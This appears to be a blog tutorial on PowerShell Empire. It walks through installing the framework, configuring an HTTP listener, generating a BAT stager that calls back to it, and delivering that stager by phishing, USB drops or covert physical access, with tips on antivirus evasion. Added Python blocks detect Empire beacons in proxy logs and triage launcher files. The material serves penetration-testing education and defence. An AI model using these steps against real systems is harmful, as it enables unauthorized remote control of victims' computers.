
Hacking Computers With PowerShell Empire 💀🔓

Empire is a unique tool for generating discreet, stealthy malware that can be used to take full control of a target’s computer.

Read this bit first

👉 I strongly condemn any illegal use of this material as is outlined in my legal disclaimer. There are plenty of responsible applications for this content, and it is here to inform ethical hackers, penetration testers, and anyone who is intrigued as to how systems are compromised. Remember the golden rule and THINK before you type. 👈

What you will learn

Empire has been around since 2015, and despite the original GitHub repo being archived, PowerShell Empire (now maintained as a fork by BC-Security, which is the version Kali packages) still has a group of loyal patrons using it to serve up some slick reverse shells.

PowerShell Empire, or Empire for short, allows a hacker to create working malware within minutes while still getting powerful features: encrypted command and control, in-memory execution of the agent, and a large library of post-exploitation modules.

I have used Empire on and off for a few years now, and in this guide, we will explore what Empire is, how it works, and how it can be used to gain full control over a target’s computer.

What is Empire?

PowerShell Empire is a post-exploitation framework that has gained significant traction in cybersecurity, particularly in penetration testing and red teaming. In short, Empire lets almost anyone create discreet backdoors and reverse shells, a form of malware, and run them on a target's computer.

Once an agent is running, the operator controls that computer with the privileges of the account that ran the stager. Taking full control usually means a further privilege-escalation step, which Empire's modules support.

Developed by Will Schroeder, Matt Nelson, and Justin Warner, it fills a crucial niche by leveraging the power of PowerShell, a scripting language native to Windows operating systems, for offensive security operations.

Unlike tools such as TheFatRat and Veil, Empire does not rely on Metasploit to build its backdoors. Instead, it drives Microsoft's PowerShell, which has shipped with Windows since Windows 7.

Empire encrypts its command and control traffic. During staging the agent and the server negotiate a per-agent AES session key, and every tasking and result after that is AES-encrypted and authenticated with an HMAC, so the content of the channel is hidden from anyone watching the wire. Be clear about what that buys you: encrypted C2 protects the traffic, not the stager sitting on disk or in memory. In my experience these stagers can often bypass antivirus software; however, heuristic analysis is catching up, and the unmodified Empire launcher is now signatured by AMSI-aware products such as Defender, so expect to obfuscate or rework it on a defended host.

Installing Empire

Installing Empire within Kali Linux or Parrot OS is a straightforward process, and the necessary files can be easily retrieved from the apt package manager.

To get started, we will update our package index so we retrieve the latest versions, by entering sudo apt update into your terminal. Because we are using sudo (the equivalent of running software as an administrator) we must provide a password. Enter your password and then proceed to the next step.

Then, we can install PowerShell Empire with the second command below:

    sudo apt update
    sudo apt install powershell-empire

And that’s all there is to it! We now have Empire installed. Now, it’s time to start hacking.

Starting our server

To run Empire, we must do two things: run the server, and then the client.

The server is the 'backend' of Empire. It hosts the listeners, keeps track of agents, serves the stagers (Empire's name for the first-stage payloads) and exposes a REST API, on port 1337 by default, that the client talks to.

The Empire client is what we as operators use to create stagers and interact with the agents that call back.

To use Empire, we must first start the server on our Kali Linux machine. Enter the following in a terminal, prefixed with sudo:

    sudo powershell-empire server

When the server is up you can minimise that terminal, since the client terminal is where you will spend your time, but do not close it: if the server exits, every listener goes down with it and any agent that checks in gets no answer.

Starting the Empire Client

To run the Empire client, enter the command below in a second terminal, leaving the server terminal running. When using Empire you will predominantly be working with the client: it is where we create stagers and interact with the computers we hack. The client reads its server list from its config file and connects to the local server with the stock account. Those credentials (empireadmin / password123) are public knowledge, so change them before the server is reachable from anywhere but localhost.

    sudo powershell-empire client

You will now see a screen on your terminal as below. On the left hand panel is my Empire Server, and on the right panel is my Empire Client.

Empire Kali Linux Setup

Powershell Empire In Kali Linux Features, Components, & Help Menu

To use Empire in Kali Linux, we must know the key terms within the package. Type help in your client terminal to see the available menus and commands:

    help

This will display all the options and modules in a format as shown below:

Empire Kali Linux Help

For the uninitiated, I will briefly explain what each of these key options means.

Listeners

Listeners in Empire are the endpoints that compromised hosts (agents) call back to. Each listener defines how its agents communicate: the address and port to connect to, the protocol, and the traffic profile. Empire ships several types, including http, http_malleable (traffic shaped by a malleable C2 profile), http_hop (a redirector), and cloud-backed listeners such as dbx (Dropbox) and onedrive. Think of listeners as the receivers waiting to catch signals from agents deployed on target systems.

Agents

In the context of Empire, agents are instances of PowerShell scripts or payloads that are deployed on compromised systems. These agents beacon back to the Empire server, establishing a connection that allows operators to remotely control and manage the compromised host. Agents serve as the foothold for post-exploitation activities, providing access to system resources and enabling further penetration testing or red team operations.

Interact

The "interact" command in Empire allows operators to work with a specific agent that has checked in to the Empire server: run agents to list them, then interact followed by the agent's name to select one. Once an agent is selected, operators can execute commands, deploy modules, gather information, or perform other actions on the compromised system. Interacting with agents provides a direct channel for post-exploitation activities.

Plugins

Empire offers a plugin system that extends its functionality beyond its core features. Plugins are additional modules or scripts that provide specialised capabilities for specific tasks or scenarios. These can include custom payloads, post-exploitation modules, evasion techniques, or automation scripts. Plugins allow users to tailor Empire to their specific needs and enhance its effectiveness in various cybersecurity engagements.

Connect

The "connect" command points the Empire client at an Empire server, local or remote; it does not link servers to each other. In the current client, connect -c localhost connects using the localhost entry from the client's config file, and connect followed by a host, --username and --password connects to any other server's REST API (port 1337 by default). This is how several operators share one server during an engagement, and it is also why that API port should never be exposed beyond the team's network.

Admin

The "admin" command opens the server administration menu; it does not elevate anything. From there you manage the user accounts that are allowed to connect to the server and other server-side settings. Because anyone who can reach the server's API port with valid credentials controls every agent, keep that port on localhost or behind a firewall and change the stock password.

Creating Listeners in Powershell Empire

Let's get started hacking with Empire. We will start by creating a listener.

As discussed above, a listener is how compromised hosts communicate with the operator's command and control server. There are several listener types available, using a variety of protocols.

In our case, we will use the http listener. Be precise about what "disguised as legitimate traffic" means here: the transport is plain HTTP, but the tasking and results inside each request are AES-encrypted with the agent's session key, so a network defender cannot read them. What they can see is the pattern: regular requests to the listener's DefaultProfile paths (by default /admin/get.php, /news.php and /login/process.php) carrying the profile's User-Agent, an Internet Explorer 11 string. Change DefaultProfile (or use the http_malleable listener) if that matters, and set CertPath if you want the listener served over HTTPS.

Enter the following command to start configuring your HTTP listener.

Configuring an Empire Listener

    uselistener http

This drops you into the listener's configuration. The listener itself does not exist until you run execute at the end of this section.

Now, it is time to check the settings and configurations of our listener. By default, most of the settings work perfectly fine – although you may want to modify a few to suit your preferences.

You can see a list of the default configurations of the listener in my screenshot below.

Empire Kali Linux Listener Setup

The port number, however, is a setting you must fill in. Choose a free port that the target can reach; low ports such as 80 and 443 need root, which we have via sudo. Option names match the left-hand column of the options table:

    set Port 8080

Now that we have set the port number, re-enter the options command to see the updated list. You should see your chosen port in the Port row. Also check the Host value: it is the URL that gets baked into the stager, so it must be an address the target can actually reach, and if it does not already include your port, set it too (for example set Host http://<your Kali IP>:8080). In my case, for demonstration purposes, I have chosen port 8080.

    options

Activating an Empire Listener

Once you are happy with all the options configured to your preferences, activate the listener with the command below:

    execute

It should state that the listener has successfully started; you can confirm with the listeners command from the main menu. Congratulations! The first part is now complete.
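To see what the stock http listener looks like from the other side, here is an added example (my code, not part of the original article and not Empire's) that scores web-proxy log lines against the listener's default DefaultProfile: the three request paths, the IE11 User-Agent, and the base64 "session" cookie an agent uses to carry its routing packet. The log lines are constructed for the example, the proxy log layout is an assumption (combined format with a trailing Cookie field), and the cookie value is an arbitrary base64 string, not a real routing packet.

```python
import re

# Stock DefaultProfile of Empire's http listener: request paths to the left of
# the '|', User-Agent to the right. Operators who never change it are trivially
# fingerprintable.
EMPIRE_DEFAULT_PROFILE = (
    "/admin/get.php,/news.php,/login/process.php|"
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
)
_paths, DEFAULT_UA = EMPIRE_DEFAULT_PROFILE.split("|", 1)
DEFAULT_PATHS = frozenset(_paths.split(","))

# Assumed proxy layout: combined log format plus an optional quoted Cookie field
# (%h %l %u [%t] "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{Cookie}i").
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?\s*$'
)
# Empire GET check-ins carry the routing packet base64-encoded in a 'session' cookie.
SESSION_COOKIE_RE = re.compile(r"(?:^|;\s*)session=[A-Za-z0-9+/]{20,}={0,2}(?:;|$)")


def score_line(line):
    """Return the indicators found on one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path = m.group("uri").split("?", 1)[0]
    indicators = []
    if path in DEFAULT_PATHS:
        indicators.append("default-profile path")
    if m.group("ua") == DEFAULT_UA:
        indicators.append("default-profile user-agent")
    if SESSION_COOKIE_RE.search(m.group("cookie") or ""):
        indicators.append("base64 session cookie")
    return {"src": m.group("src"), "method": m.group("method"),
            "path": path, "indicators": indicators}


def find_empire_beacons(lines, min_indicators=2):
    """Group lines that hit at least min_indicators by source address."""
    hits = {}
    for line in lines:
        scored = score_line(line)
        if scored and len(scored["indicators"]) >= min_indicators:
            hits.setdefault(scored["src"], []).append(scored)
    return hits


# Constructed sample: three check-ins from 10.0.0.5 using the stock profile, one
# ordinary browser request, and one coincidental hit on /news.php.
IE11_UA = DEFAULT_UA
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/122.0 Safari/537.36")
SAMPLE_LOG = [
    f'10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /admin/get.php HTTP/1.1" 200 1231 "-" "{IE11_UA}" "session=Q0xJRU5UX1NFU1NJT05fUk9VVElOR19QQUNLRVQ="',
    f'10.0.0.5 - - [12/Mar/2024:10:15:06 +0000] "GET /news.php HTTP/1.1" 200 1231 "-" "{IE11_UA}" "session=Q0xJRU5UX1NFU1NJT05fUk9VVElOR19QQUNLRVQ="',
    f'10.0.0.5 - - [12/Mar/2024:10:15:11 +0000] "POST /login/process.php HTTP/1.1" 200 17 "-" "{IE11_UA}"',
    f'192.168.1.20 - - [12/Mar/2024:10:15:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "{CHROME_UA}"',
    f'192.168.1.21 - - [12/Mar/2024:10:15:04 +0000] "GET /news.php?id=7 HTTP/1.1" 200 880 "https://intranet.example/" "{CHROME_UA}"',
]

if __name__ == "__main__":
    for src, rows in find_empire_beacons(SAMPLE_LOG).items():
        print(f"{src}: {len(rows)} Empire-like requests")
        for row in rows:
            print(f"  {row['method']} {row['path']}: {', '.join(row['indicators'])}")
```

Two or more indicators on a line from one source is a strong hit; a lone path match is noise on any busy web server, which is why the threshold exists. Anyone who changed DefaultProfile will sail past this, so treat it as a check for lazy defaults rather than a general Empire detector.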

What are stagers in PowerShell Empire?

Now that we have generated our listener, it's time to create the payload. This is referred to as a stager in Empire: a small first-stage launcher that, when it runs on the target's computer, calls back to the listener, fetches the full agent and starts it in memory. To reiterate, this is the piece that will detonate on the target's computer.

First, we will go back to the Empire client's home screen and navigate away from the listener screen.

    back
				
			


There are a number of different Empire Stagers. I have listed a few below, but feel free to skip to the next section.

Empire EXE Stager

Windows Executable (EXE) Stager: This stager generates a standalone Windows executable (.exe) that, when run, launches the PowerShell agent. The executable itself necessarily lands on disk; what you gain is that the agent it launches runs in memory. Do not mistake that for a file-less stager: a standalone EXE is the easiest format for antivirus to scan and signature, so expect detection on a patched, defended host.

Powershell Stager

PowerShell Stager: As PowerShell is native to Windows, this stager is a PowerShell one-liner (or script) that pulls the agent from the listener and runs it in memory, so no new executable is dropped; it rides on powershell.exe, a signed Microsoft binary. That is the source of both its popularity and its biggest weakness: AMSI, PowerShell script block logging and Constrained Language Mode (what AppLocker or WDAC impose on PowerShell) exist specifically to catch this pattern, and the unmodified Empire launcher is widely signatured.

Macro Stager

Macro Stager: This stager utilises malicious macros embedded within documents (e.g., Microsoft Office documents) to execute PowerShell or other Empire payloads. Macro stagers are commonly delivered via phishing emails and exploit the trust users place in seemingly legitimate documents, making them an effective vector for initial compromise.

DLL Stager

DLL (Dynamic Link Library) Stager: DLL stagers generate dynamic link library (.dll) files that can be injected into processes or loaded via reflective injection techniques. DLL stagers are often used in memory-resident attacks to achieve stealthy persistence and evade detection by antivirus solutions.

Python Stager

Python Stager: This stager generates Python scripts that execute Empire payloads using the Python interpreter. Python stagers are versatile and can be used on a variety of platforms, making them suitable for cross-platform deployments and engagements targeting environments where Python is prevalent.

Generating stagers in PowerShell Empire

There are many more stagers other than those listed above. For the purposes of this tutorial, we will use a Windows Launcher in a BAT Format – when I have the time, I will revisit this article and explain exactly what this means.

Anyway, you can do so by entering the following command.

    usestager windows_launcher_bat

This will show the following result on your terminal.

Empire Kali Linux Stager Setup

You can modify any of these options by using the set command.

The main value that we must set, however, is the listener. This links the stager to the listener we created earlier, and it is that listener's Host and Port that get embedded in the file. Use the listener's Name, which is http unless you changed it:

    set Listener http

We should also rename the output file so that it replaces the generic name. Again, we use the set command, and remember to use the appropriate file suffix, in our case, BAT:

    set OutFile mytestempire.bat

Finally, we can now generate our file. Again, to do so, simply enter the following command:

    generate

And that’s it! Now we have generated a BAT Empire Stager, and a listener, and we are now ready to begin exploiting our target – legally and ethically, of course ;D
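Putting the listener and stager steps together in one place: the Empire client can replay a file of client commands with a resource-file option (powershell-empire client -r setup.rc on Empire 4 and later). That flag is my assumption rather than something the article covers, so check powershell-empire client --help on your install before relying on it. The file below is an added example, not from the article or the Empire project; 192.0.2.10 is a documentation placeholder for your Kali address, and the port is the one chosen above.

```text
uselistener http
set Name http
set Host http://192.0.2.10:8080
set Port 8080
execute
back
usestager windows_launcher_bat
set Listener http
set OutFile mytestempire.bat
generate
```

Keeping the setup in a file like this also gives you a record of exactly which Host, Port and profile a given stager was built with, which matters when you are cleaning up after an engagement.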

Infiltrating our target


Now that we’ve set up the stager and listener in PowerShell Empire, the next step is to deliver the payload to the target system and execute it. Here’s how we can proceed:

Delivering the malware

There are various delivery methods to consider, depending on the target’s environment and the level of access we have. Common delivery methods include:

  • Social Engineering: Utilise phishing emails, malicious links, or USB drops to trick the target into executing the payload.
  • Exploitation: Exploit vulnerabilities in software or services running on the target system to gain execution privileges.
  • Physical Access: Directly install the payload on the target system if physical access is available. This essentially involves sneaking it onto a target’s computer whilst they least expect it.

Executing the Empire Stager on the target's device

Once the payload is delivered to the target system, it needs to be executed to establish communication with the Empire listener. This can be achieved through techniques such as:

  • Running the BAT Empire Stager: If we generated a BAT stager, the target can execute it by double-clicking the file or running it via command prompt.
  • Exploiting Vulnerabilities: If exploiting vulnerabilities, the payload may be injected into a vulnerable application or service to gain code execution.
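Before handing a stager to anyone, or when you find one on a host, it pays to know what a windows_launcher_bat file typically contains: a batch file that starts a hidden PowerShell process with a base64-encoded (UTF-16LE) command and then deletes itself. The following is an added example of mine, not Empire's code and not from the article, that pulls the encoded command out of such a file, decodes it, and notes the tell-tale switches. The sample .bat it parses is constructed inside the block and carries a harmless Write-Host rather than an Empire launcher.

```python
import base64
import re

# PowerShell switches a launcher line tends to carry, and what each one means.
# Matched case-insensitively; PowerShell also accepts unambiguous prefixes.
SWITCH_MEANINGS = [
    (r"-nop(rofile)?\b", "-NoProfile (skip profile scripts)"),
    (r"-w(indowstyle)?\s+(1|hidden)\b", "hidden window"),
    (r"-sta\b", "-STA apartment state"),
    (r"-noni(nteractive)?\b", "-NonInteractive"),
    (r"-ex(ec(utionpolicy)?)?\s+bypass\b", "-ExecutionPolicy Bypass"),
]
# -EncodedCommand and its accepted abbreviations, followed by the base64 blob.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# The batch-file idiom for deleting the running script (%~f0 is its own path).
SELF_DELETE_RE = re.compile(r'del\s+"?%~f0"?', re.I)


def decode_encoded_command(blob):
    """-EncodedCommand takes base64 of the UTF-16LE script; None if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_launcher_bat(bat_text):
    """Pull the encoded PowerShell out of a .bat and note the evasion tells."""
    report = {"encoded_blob": None, "decoded_command": None,
              "switches": [], "self_deletes": False}
    m = ENCODED_RE.search(bat_text)
    if m:
        report["encoded_blob"] = m.group(1)
        report["decoded_command"] = decode_encoded_command(m.group(1))
    for pattern, meaning in SWITCH_MEANINGS:
        if re.search(pattern, bat_text, re.I):
            report["switches"].append(meaning)
    report["self_deletes"] = SELF_DELETE_RE.search(bat_text) is not None
    return report


def build_sample_bat(ps_command):
    """Constructed stand-in for a windows_launcher_bat file: same shape (hidden
    PowerShell with an encoded command, then self-delete) but a harmless payload."""
    blob = base64.b64encode(ps_command.encode("utf-16-le")).decode("ascii")
    return ("@echo off\n"
            f"start /b powershell -noP -sta -w 1 -enc {blob}\n"
            'start /b "" cmd /c del "%~f0"&exit /b\n')


SAMPLE_BAT = build_sample_bat("Write-Host 'constructed harmless sample'")

if __name__ == "__main__":
    for key, value in triage_launcher_bat(SAMPLE_BAT).items():
        print(f"{key}: {value}")
```

Run it over a real generated stager and the decoded command is the Empire launcher itself. That is why a .bat in a user's Downloads folder with -w 1, -enc and a del "%~f0" line deserves an immediate look, and why the "double-click the file" delivery above works at all: nothing the user sees hints at PowerShell.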


Now obviously, if I was to hack a target, I would be much, much more discreet than this. I would embed the malware in something that seems innocent looking, and I would have run the stager through a free online service that checks whether or not your malware will be detected by antivirus. One caveat there: the public multi-engine scanners share uploaded samples with the antivirus vendors, so a stager you submit is likely to be signatured soon after. A non-distributing scanner, or your own lab VM running the target's antivirus, is the safer check.

Coming Soon: Exploiting the target...

Now that we have hacked our target, it is time to begin causing problems… to put it mildly. I haven’t finished writing this article but I will come back to it soon, I promise. In the meantime, you can subscribe to my newsletter to get notified, or contact me if you need any help running Empire (in a legal and ethical context).


About Aitken Security

Aitken Security is a UK Cybersecurity Company specialising in offensive and defensive security.